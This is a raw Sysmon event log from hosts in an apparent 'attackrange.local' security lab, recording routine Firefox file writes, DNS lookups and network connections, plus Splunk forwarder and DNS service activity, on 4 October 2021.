23542300x8000000000000000107367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.725{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=01F7C067A6D41972F3E5093879FF3057,SHA256=2FADE80AE39DF2A22C890F1C11A8320D6DB82BA52AF0CFC4B20CD27D9A60182B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.719{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=1218A53B6DCB6916B82D9F0E2541178D,SHA256=95748481EFD14EFF1D6DCE07C3E2FB2AF2E61752F2812B178187FFFF31DD1A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.555{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmpaddonMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=EE9C9CE304A226EDE73443EF6BD5934D,SHA256=FD52CEA2BD04032934E56AC301A4F96061CFC8B9738F9311DE2C29141538BD37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=29E8C762FD6FC24E058B1B26B533FA34,SHA256=A6902AAB32D46D572B088FA7D1D50116EB25F623C21C1AA3B8AD2FD7D85321D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=A65FC80E7AA178294D2F3CF46DB49D3C,SHA256=BFB3C8BC64A927D0D5A4CF408DB38736696AA6B364766CB06DD0E7D44AC46F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=53B2F671018459B8F83C9911FF227EEA,SHA256=B6C9B667AB66D5B6181AB33D672518917B4279D3098AFF27D9596AF7E0965CFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=900F55E09A48FD4A7DEA794D65508230,SHA256=60FC54A56D05AA864CF64B8CFD7330205477D7EE4CAA771588626AC85D067063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.470{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=D092A771CCA22225AD1FFFD3C1F550A6,SHA256=6C1C12A1CD6C7D36424915C6E5958D05FC5339FAAAA21B83C2D4101AD8DBF654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=49E068706D9F7488CA24DC99E29BC48F,SHA256=6A0CE630BEAC2C64904F69980E25A043B39A3DA862F870622762AC5E40A3EAF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=75E3AA809FCC58573637562569E7E7A5,SHA256=00BF2205BD3DD32F814A300F6BA3D6C4CF29BF26FBF1A1BD40AE86D0DECEC004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=ACCC243455801B8CA587A90F4B23E6D1,SHA256=649A73EDC2A2A721064CCE6323685CEEDD342C01E39E3CA002EBBDCD801F284B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=EC5B323BCBB74848C3676DE431754075,SHA256=696B6194E4C42C5C9D92CC04B6B1DE8C72223233F3BA3C346C2C0F5C0DDF02B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=33F19981F1696CCFED9B896E434D37D9,SHA256=D5DFF2467524EC7738838EA0E259C964669BAEA82665236367CB182499E20149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.455{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=DA2DA16A7DB9DF09F13E11B9AB08C227,SHA256=53CB92285736480A70EC911E25529A69DDB2B1B5E07D1629A2C25F397756ABFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.271{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A167124AC1BDDCB9DA06FCC1B3CD624C,SHA256=52B55DD0CC06B849AA7BB2392DB1B914A190D314512EC2764511D5755C39CDE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083448Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:49.379{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=298F081D9E0876B65DF58274C0668089,SHA256=14AC8A28D7A57C5CD1DE93666EB0E7512E1C92AAA14ACFD8F9E621B548803931,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.000{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50412- 354300x8000000000000000107429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.992{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60750- 354300x8000000000000000107428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.977{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60750- 354300x8000000000000000107427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.974{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local57973-false142.250.184.238fra24s12-in-f14.1e100.net443https 354300x8000000000000000107426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.941{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51892-false142.250.184.238fra24s12-in-f14.1e100.net443https 354300x8000000000000000107425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.940{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59192- 354300x8000000000000000107424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.937{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63134- 354300x8000000000000000107423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.878{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51891-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.872{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64700- 23542300x8000000000000000107421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.790{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.786{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.778{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=A5EC48690A8B5E72E3AE678C50EC164A,SHA256=92F2D571CD67A28F4415FCB094A6E1BA6B2134B28C65452202EC31985F80AB18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.774{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=1A1251BD3D1B31B84E8ABDFAD7C790E3,SHA256=F45FCAA63C5E87C3ED2BE435E29B343A3D33F459D1C0CFC4AC3EAB141C63A5F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.717{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.714{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.708{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=C39D8B2DC30102184FC44820ABC3A0D2,SHA256=AEC21722E9D4EEBFEA2370A496D993E82E8CE0D20D85AC0CCC08E49F283D73D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.700{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=348B811F4AAC821E585CD961F6A5908B,SHA256=F4295245B4515ABF60947A7E3920D1776044A75A46EBCA557F01BDA2452E7DD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.797{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51890-false2.16.218.169a2-16-218-169.deploy.static.akamaitechnologies.com80http 354300x8000000000000000107412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.797{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49812- 354300x8000000000000000107411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.759{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58482- 354300x8000000000000000107410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.740{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58482- 354300x8000000000000000107409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.731{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51889-false93.184.220.29-80http 354300x8000000000000000107408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.725{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51041- 354300x8000000000000000107407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.710{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51888-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x8000000000000000107406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.710{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51145- 23542300x8000000000000000107405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.474{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000107404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.011{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net02600:9000:225e:600:a:da5e:7900:93a1;2600:9000:225e:cc00:a:da5e:7900:93a1;2600:9000:225e:f200:a:da5e:7900:93a1;2600:9000:225e:fc00:a:da5e:7900:93a1;2600:9000:225e:2e00:a:da5e:7900:93a1;2600:9000:225e:2c00:a:da5e:7900:93a1;2600:9000:225e:c400:a:da5e:7900:93a1;2600:9000:225e:c00:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.010{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net018.66.139.97;18.66.139.17;18.66.139.125;18.66.139.67;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.806{58E9C193-B422-615A-0602-00000000FC01}5552a19.dscg10.akamai.net02a02:26f0:1700:f::1737:a1b9;2a02:26f0:1700:f::1737:a1d3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.803{58E9C193-B422-615A-0602-00000000FC01}5552a19.dscg10.akamai.net02.16.218.184;2.16.218.169;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.802{58E9C193-B422-615A-0602-00000000FC01}5552ciscobinary.openh264.org0type: 5 a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com;type: 5 a17.rackcdn.com;type: 5 a17.rackcdn.com.mdc.edgesuite.net;type: 5 a19.dscg10.akamai.net;::ffff:2.16.218.169;::ffff:2.16.218.184;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.731{58E9C193-B422-615A-0602-00000000FC01}5552prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000107398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.715{58E9C193-B422-615A-0602-00000000FC01}5552prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000107397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.438{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=498B17C85EDD0A897221466FE0F5C295,SHA256=8832258EAAC3236C9C1D1E883CE711BBCF6D3752AA1878AD28C74A51246D7C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.388{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.382{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=6594F47856653534DC9093310B20F81E,SHA256=92B77642427B0696A9337BBC0F3B9928BD3D667B0CEECE52ACE4B50731071489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.380{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=D11D020FCFAA32DDDAB10074536E719B,SHA256=F5901806E36C6830D51FD5F8BECC130260885735DD4FD7237ECA68BD7C0D85B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.344{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51887-false10.0.1.12-8000- 23542300x8000000000000000107392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.317{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.308{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.304{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=582598C4D3828803C43A3B474A9308DF,SHA256=C098DF5125E8848A5AB49780F7B0062A9632C6E745638B8D9A78B471E5834B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.298{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=99B2C8AF735B66F5B59E339FF35D04F1,SHA256=DE788D91F83DABDF89EA8479CB69DDB905F983A7723A1EF6B42F77EA6D3C6AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.230{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 